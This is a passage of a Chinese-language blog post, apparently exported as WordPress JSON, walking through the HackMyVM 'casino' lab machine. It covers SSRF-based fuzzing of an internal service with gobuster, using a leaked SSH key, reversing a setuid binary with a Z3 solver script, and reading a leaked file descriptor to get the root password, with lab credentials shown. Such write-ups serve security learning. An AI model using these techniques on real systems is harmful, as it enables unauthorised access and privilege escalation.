src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321135307932\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u540c\u6837\u8fc7\u6ee4\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster fuzz -u &quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/FUZZ&quot; -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot; --exclude-length &quot;1130&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527076.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527076.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321135541312\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">gobuster fuzz -u &quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/FUZZ&quot; -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -b 400 -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot; --exclude-length &quot;1130&quot; <\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527077.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527077.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140504464\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">Found: [Status=200] [Length=1407] [Word=codebreakers] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/codebreakers\n\nFound: [Status=200] [Length=22090] [Word=server-status] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/server-status\n\nFound: [Status=200] [Length=1969] [Word=%3FRID%3D2671] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/%3FRID%3D2671<\/code><\/pre>\n<p>\u6328\u4e2a\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527078.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527078.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140550358\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527079.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527079.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140604238\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527080.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527080.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140639780\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u767b\u5f55\u5bc6\u94a5\u4e86\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff01<\/p>\n<pre><code class=\"language-bash\">chmod 600 fuck_rsa\nssh shimmer@10.160.52.102 -i fuck_rsa<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527081.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527081.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321140900129\" style=\"zoom:67%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u67e5\u770b\u57fa\u7840\u4fe1\u606f<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527082.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527082.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321141026071\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\u3002<\/p>\n<pre><code class=\"language-apl\">casinousergobrrr<\/code><\/pre>\n<pre><code class=\"language-bash\">shimmer@casino:~$ file pass\n# pass: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=69534d98e628cad52c35ba899c71650dc0e48bdf, for GNU\/Linux 3.2.0, not stripped<\/code><\/pre>\n<p>\u884c\u5427\uff0c\u7b49\u4e0b\u4f20\u8fc7\u6765\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">shimmer@casino:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/home\/shimmer\/pass\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh<\/code><\/pre>\n<p>\u770b\u6765\u5c31\u662f\u8ba9\u6211\u4eec\u5206\u6790\u8fd9\u4e2a<code>pass<\/code>\u7a0b\u5e8f\u4e86\u3002\u3002\u3002\u4f20\u8fc7\u6765\u770b\u770b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527083.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527083.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321142031672\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u4e22\u8fdb<code>ida<\/code>\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __uid_t v3; \/\/ eax\n  char s1[112]; \/\/ [rsp+10h] [rbp-F0h]\n  char *argva; \/\/ [rsp+80h] [rbp-80h]\n  __int64 v7; \/\/ [rsp+88h] [rbp-78h]\n  char s[108]; \/\/ [rsp+90h] [rbp-70h]\n  int v9; \/\/ [rsp+FCh] [rbp-4h]\n\n  printf(&quot;Passwd: &quot;, argv, envp, argv);\n  fgets(s, 100, stdin);\n  if ( s[strlen(s) - 1] == 10 )\n    s[strlen(s) - 1] = 0;\n  if ( (unsigned int)checkPasswd(s, 100LL) != 1 )\n    return 0;\n  v9 = open(&quot;\/opt\/root.pass&quot;, 0);\n  v3 = getuid();\n  setuid(v3);\n  printf(&quot;Second Passwd: &quot;);\n  fgets(s1, 100, stdin);\n  if ( s1[strlen(s1) - 1] == 10 )\n    s1[strlen(s1) - 1] = 0;\n  if ( !strcmp(s1, &quot;ultrasecretpassword&quot;) )\n  {\n    argva = &quot;sh&quot;;\n    v7 = 0LL;\n    execvp(&quot;\/bin\/sh&quot;, &amp;argva);\n  }\n  else\n  {\n    puts(&quot;bye.&quot;);\n  }\n  return 0;\n}<\/code><\/pre>\n<ol>\n<li>\u7a0b\u5e8f\u5f00\u59cb\u65f6\uff0c\u63d0\u793a\u7528\u6237\u8f93\u5165\u5bc6\u7801\uff08\u901a\u8fc7 <code>printf<\/code> \u51fd\u6570\uff09\uff0c\u7136\u540e\u4ece\u6807\u51c6\u8f93\u5165\uff08stdin\uff09\u4e2d\u83b7\u53d6\u7528\u6237\u8f93\u5165\u7684\u5bc6\u7801\uff08\u901a\u8fc7 <code>fgets<\/code> \u51fd\u6570\uff09\u3002\u83b7\u53d6\u7684\u5bc6\u7801\u5b58\u50a8\u5728\u5b57\u7b26\u6570\u7ec4 <code>s<\/code> \u4e2d\u3002<\/li>\n<li>\u7136\u540e\u68c0\u67e5\u8f93\u5165\u7684\u5bc6\u7801\u662f\u5426\u6b63\u786e\uff0c\u8c03\u7528 <code>checkPasswd<\/code> \u51fd\u6570\u8fdb\u884c\u9a8c\u8bc1\u3002\u5982\u679c\u5bc6\u7801\u4e0d\u6b63\u786e\uff0c\u5219\u7a0b\u5e8f\u76f4\u63a5\u8fd4\u56de\uff0c\u4e0d\u6267\u884c\u540e\u7eed\u64cd\u4f5c\u3002<\/li>\n<li>\u5982\u679c\u7b2c\u4e00\u4e2a\u5bc6\u7801\u9a8c\u8bc1\u901a\u8fc7\uff0c\u5219\u5c1d\u8bd5\u6253\u5f00\u6587\u4ef6 <code>\/opt\/root.pass<\/code>\uff08\u901a\u8fc7 <code>open<\/code> \u51fd\u6570\uff09\u3002\u7136\u540e\u83b7\u53d6\u5f53\u524d\u7528\u6237\u7684\u7528\u6237 ID\uff08UID\uff09\uff08\u901a\u8fc7 <code>getuid<\/code> \u51fd\u6570\uff09\uff0c\u5e76\u4f7f\u7528 <code>setuid<\/code> \u51fd\u6570\u5c06\u7a0b\u5e8f\u7684\u6709\u6548\u7528\u6237 ID\uff08EUID\uff09\u8bbe\u7f6e\u4e3a\u5f53\u524d\u7528\u6237\u7684 UID\u3002<\/li>\n<li>\u7a0b\u5e8f\u63a5\u7740\u63d0\u793a\u7528\u6237\u8f93\u5165\u7b2c\u4e8c\u4e2a\u5bc6\u7801\uff0c\u5e76\u5c06\u5176\u5b58\u50a8\u5728\u5b57\u7b26\u6570\u7ec4 <code>s1<\/code> \u4e2d\u3002<\/li>\n<li>\u5982\u679c\u7b2c\u4e8c\u4e2a\u5bc6\u7801\u662f <code>ultrasecretpassword<\/code>\uff0c\u5219\u5c06 <code>argva<\/code> \u8bbe\u7f6e\u4e3a &quot;sh&quot;\uff0c\u5c06 <code>v7<\/code> \u8bbe\u7f6e\u4e3a 0\uff0c\u7136\u540e\u8c03\u7528 <code>execvp<\/code> \u51fd\u6570\u4ee5\u6267\u884c &quot;\/bin\/sh&quot;\uff0c\u4ece\u800c\u6253\u5f00\u4e00\u4e2a shell\u3002<\/li>\n<li>\u5982\u679c\u7b2c\u4e8c\u4e2a\u5bc6\u7801\u4e0d\u662f <code>ultrasecretpassword<\/code>\uff0c\u5219\u7a0b\u5e8f\u6253\u5370 <code>bye.<\/code> \u5e76\u8fd4\u56de\u3002<\/li>\n<\/ol>\n<pre><code class=\"language-c\">\/\/ checkPasswd\nsigned __int64 __fastcall checkPasswd(const char *a1)\n{\n  signed __int64 result; \/\/ rax\n\n  if ( strlen(a1) == 26 )\n  {\n    if ( *a1 - a1[20] == -10 )\n    {\n      if ( a1[1] + a1[6] == 208 )\n      {\n        if ( a1[2] - a1[4] == 10 )\n        {\n          if ( a1[3] - a1[14] == -2 )\n          {\n            if ( a1[4] * a1[25] == 10100 )\n            {\n              if ( a1[5] + a1[17] == 219 )\n              {\n                if ( a1[6] - a1[10] == -11 )\n                {\n                  if ( a1[7] - a1[20] == -10 )\n                  {\n                    if ( a1[8] * a1[17] == 11845 )\n                    {\n                      if ( a1[9] - a1[18] == -7 )\n                      {\n                        if ( a1[10] - a1[24] == 1 )\n                        {\n                          if ( a1[11] * a1[4] == 9797 )\n                          {\n                            if ( a1[12] - a1[3] == 3 )\n                            {\n                              if ( a1[13] * a1[11] == 11252 )\n                              {\n                                if ( a1[14] - a1[13] == -2 )\n                                {\n                                  if ( a1[15] == a1[23] )\n                                  {\n                                    if ( a1[16] - a1[8] == -5 )\n                                    {\n                                      if ( a1[17] * a1[7] == 10815 )\n                                      {\n                                        if ( a1[18] - a1[14] == -2 )\n                                        {\n                                          if ( a1[19] - *a1 == -8 )\n                                          {\n                                            if ( a1[20] - a1[23] == 4 )\n                                            {\n                                              if ( a1[21] + a1[7] == 220 )\n                                              {\n                                                if ( a1[22] - a1[1] == 15 )\n                                                {\n                                                  if ( a1[23] == a1[15] )\n                                                  {\n                                                    if ( a1[24] * a1[2] == 12654 )\n                                                    {\n                                                      if ( a1[25] - a1[12] == -15 )\n                                                      {\n                                                        puts(&quot;Correct pass&quot;);\n                                                        result = 1LL;\n                                                      }\n                                                      else\n                                                      {\n                                                        result = 0LL;\n                                                      }\n                                                    }\n                                                    else\n                                                    {\n                                                      result = 0LL;\n                                                    }\n                                                  }\n                                                  else\n                                                  {\n                                                    result = 0LL;\n                                                  }\n                                                }\n                                                else\n                                                {\n                                                  result = 0LL;\n                                                }\n                                              }\n                                              else\n                                              {\n                                                result = 0LL;\n                                              }\n                                            }\n                                            else\n                                            {\n                                              result = 0LL;\n                                            }\n                                          }\n                                          else\n                                          {\n                                            result = 0LL;\n                                          }\n                                        }\n                                        else\n                                        {\n                                          result = 0LL;\n                                        }\n                                      }\n                                      else\n                                      {\n                                        result = 0LL;\n                                      }\n                                    }\n                                    else\n                                    {\n                                      result = 0LL;\n                                    }\n                                  }\n                                  else\n                                  {\n                                    result = 0LL;\n                                  }\n                                }\n                                else\n                                {\n                                  result = 0LL;\n                                }\n                              }\n                              else\n                              {\n                                result = 0LL;\n                              }\n                            }\n                            else\n                            {\n                              result = 0LL;\n                            }\n                          }\n                          else\n                          {\n                            result = 0LL;\n                          }\n                        }\n                        else\n                        {\n                          result = 0LL;\n                        }\n                      }\n                      else\n                      {\n                        result = 0LL;\n                      }\n                    }\n                    else\n                    {\n                      result = 0LL;\n                    }\n                  }\n                  else\n                  {\n                    result = 0LL;\n                  }\n                }\n                else\n                {\n                  result = 0LL;\n                }\n              }\n              else\n              {\n                result = 0LL;\n              }\n            }\n            else\n            {\n              result = 0LL;\n            }\n          }\n          else\n          {\n            result = 0LL;\n          }\n        }\n        else\n        {\n          result = 0LL;\n        }\n      }\n      else\n      {\n        result = 0LL;\n      }\n    }\n    else\n    {\n      result = 0LL;\n    }\n  }\n  else\n  {\n    puts(&quot;Incorrect pass&quot;);\n    result = 0LL;\n  }\n  return result;\n}<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5199\u4e00\u4e2a\u811a\u672c\uff0c\u8f93\u51fa\u6ee1\u8db3\u8981\u6c42\u7684\u5b57\u7b26\u4e32\uff0c\u7ecf\u8fc7\u7fa4\u53cb<a href=\"https:\/\/hackmyvm.eu\/profile\/?user=fl0w\">FLOW<\/a>\u63d0\u70b9\uff0c\u77e5\u9053\u4f7f\u7528<code>Z3<\/code>\u5e93\u53ef\u4ee5\u505a\u8fd9\u4ef6\u4e8b\u60c5\uff1a<\/p>\n<blockquote>\n<p><a href=\"https:\/\/www.cnblogs.com\/runwu2204\/articles\/17008164.html\">https:\/\/www.cnblogs.com\/runwu2204\/articles\/17008164.html<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/weixin_52369224\/article\/details\/120922901\">https:\/\/blog.csdn.net\/weixin_52369224\/article\/details\/120922901<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-python\">from z3 import *\n\n# \u521b\u5efa26\u4e2a\u53d8\u91cf\uff0c\u6bcf\u4e2a\u53d8\u91cf\u8868\u793a\u5b57\u7b26\u4e32\u4e2d\u5bf9\u5e94\u4f4d\u7f6e\u7684\u5b57\u7b26\na = [Int(&#039;a[%d]&#039; % i) for i in range(26)]\n\n# \u521b\u5efa\u4e00\u4e2a Z3 solver \u5b9e\u4f8b\nsolver = Solver()\n\n# \u6dfb\u52a0\u5b57\u7b26\u4e32\u957f\u5ea6\u7b49\u4e8e 26 \u7684\u7ea6\u675f\nsolver.add(len(a) == 26)\n\n# \u7ea6\u675f\u6761\u4ef6\u5217\u8868\nconstraints = [\n    a[0] - a[20] == -10,\n    a[1] + a[6] == 208,\n    a[2] - a[4] == 10,\n    a[3] - a[14] == -2,\n    a[4] * a[25] == 10100,\n    a[5] + a[17] == 219,\n    a[6] - a[10] == -11,\n    a[7] - a[20] == -10,\n    a[8] * a[17] == 11845,\n    a[9] - a[18] == -7,\n    a[10] - a[24] == 1,\n    a[11] * a[4] == 9797,\n    a[12] - a[3] == 3,\n    a[13] * a[11] == 11252,\n    a[14] - a[13] == -2,\n    a[15] == a[23],\n    a[16] - a[8] == -5,\n    a[17] * a[7] == 10815,\n    a[18] - a[14] == -2,\n    a[19] - a[0] == -8,\n    a[20] - a[23] == 4,\n    a[21] + a[7] == 220,\n    a[22] - a[1] == 15,\n    a[23] == a[15],\n    a[24] * a[2] == 12654,\n    a[25] - a[12] == -15\n]\n\n# \u6dfb\u52a0\u7ea6\u675f\u6761\u4ef6\nfor constraint in constraints:\n    solver.add(constraint)\n\n# \u68c0\u67e5\u7ea6\u675f\u662f\u5426\u6ee1\u8db3\nif solver.check() == sat:\n    model = solver.model()\n    result = &#039;&#039;.join([chr(model[a[i]].as_long()) for i in range(26)])\n    print(&quot;\u6ee1\u8db3\u6761\u4ef6\u7684\u5b57\u7b26\u4e32\u4e3a\uff1a&quot;, result)\nelse:\n    print(&quot;\u627e\u4e0d\u5230\u6ee1\u8db3\u6761\u4ef6\u7684\u5b57\u7b26\u4e32&quot;)\n# \u6ee1\u8db3\u6761\u4ef6\u7684\u5b57\u7b26\u4e32\u4e3a\uff1a ihopethisisastrongpassword<\/code><\/pre>\n<pre><code class=\"language-apl\">ihopethisisastrongpassword\nultrasecretpassword<\/code><\/pre>\n<p>\u5230\u8fd9\u91cc\u5c31\u6ca1\u8f99\u4e86\uff0c\u770b\u4f5c\u8005\u89c6\u9891\u6837\u5b50\u662f\u628a\u8f93\u51fa\u91cd\u5b9a\u5411\u5230\u4e86\u4f2a\u7ec8\u7aef\uff0c\u6240\u4ee5\u5207\u6362\u5230\u4f2a\u7ec8\u7aef\uff0c\u53d1\u73b0root\u5bc6\u7801\uff0c\u8bb0\u5f55\u5b66\u4e60\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">cd \/proc\ncd self\ncd fd\nls -la\ncat &lt;&amp;3<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527084.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527084.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321152331818\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5b9e\u9645\u4e0a\u8fd9\u91cc\u4f20\u4e2a<code>linpeas.sh<\/code>\u662f\u53ef\u4ee5\u641c\u96c6\u5230\u4fe1\u606f\u7684\u3002<\/p>\n<pre><code class=\"language-apl\">symboliclove4u<\/code><\/pre>\n<h2>\u8865\u5145<\/h2>\n<p>\u7ecf\u8fc7<a href=\"https:\/\/hackmyvm.eu\/profile\/?user=ll104567\">ll104567<\/a>\u5e08\u5085\u7684\u63d0\u70b9\uff0c\u77e5\u9053\u4e86\u539f\u7406\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211723478.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211723478.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321172159416\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211723231.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211723231.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321172309551\" style=\"zoom: 33%;\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>casino \u5bfc\u5165virtualbox\uff0c\u518d\u6539\u4e3a1.0\u534f\u8bae\uff0c\u4f7f\u7528vmware\u6253\u5f00\uff0c\u5229\u7528grub\u4fee\u6539\u7f51\u5361\u914d\u7f6e\u6587\u4ef6\uff0c [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-436","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/436","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=436"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/436\/revisions"}],"predecessor-version":[{"id":440,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/436\/revisions\/440"}],"wp:attachment":[{